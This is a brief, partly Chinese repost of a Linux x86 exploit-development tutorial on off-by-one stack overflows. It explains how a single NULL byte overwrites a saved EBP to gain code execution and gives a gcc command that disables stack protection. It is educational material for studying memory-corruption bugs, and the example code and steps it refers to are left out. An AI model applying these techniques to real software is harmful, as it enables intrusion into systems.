linux(x86) exploit 开发系列3:off-by-one
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了linux(x86) exploit 开发系列3:off-by-one相关的知识,希望对你有一定的参考价值。
What is off-by-one bug?
Copying source string into destination buffer could result in off-by-one when
- Source string length is equal to destination buffer length.
When source string length is equal to destination buffer length, a single NULL byte gets copied just above the destination buffer. Here since the destination buffer is located in stack, the single NULL byte could overwrite the least significant bit (LSB) of caller’s EBP stored in the stack and this could lead to arbitrary code execution.(在栈上,NULL覆盖了ebp的LSB)
How arbitrary code execution is achieved?
Arbitrary code execution is achieved using a technique called “EBP overwrite”. If callers’s EBP is located just above the destination buffer then after strcpy, a single NULL byte would have overwritten the LSB of caller’s EBP.
对齐
gcc -fno-stack-protector -z execstack –mpreferred -stack-boundary=2 -o vuln vuln.c
Test Step 1: Is EBP overwrite and thus return address overwrite possible?
Test Step 2: What is the offset from destination buffer.
用python的subprocess的call打开程序时和直接在终端运行程序时,栈地址是不一样的
子进程会导致 栈偏移
以上是关于linux(x86) exploit 开发系列3:off-by-one的主要内容,如果未能解决你的问题,请参考以下文章
linux(x86) exploit 开发系列4:使用return2libc绕过NX
SploitFun Linux x86 Exploit 开发系列教程
linux(x86) exploit 开发系列6:使用return-to-plt绕过ASLR
linux(x86) exploit 开发系列5:使用ret2libc链绕过NX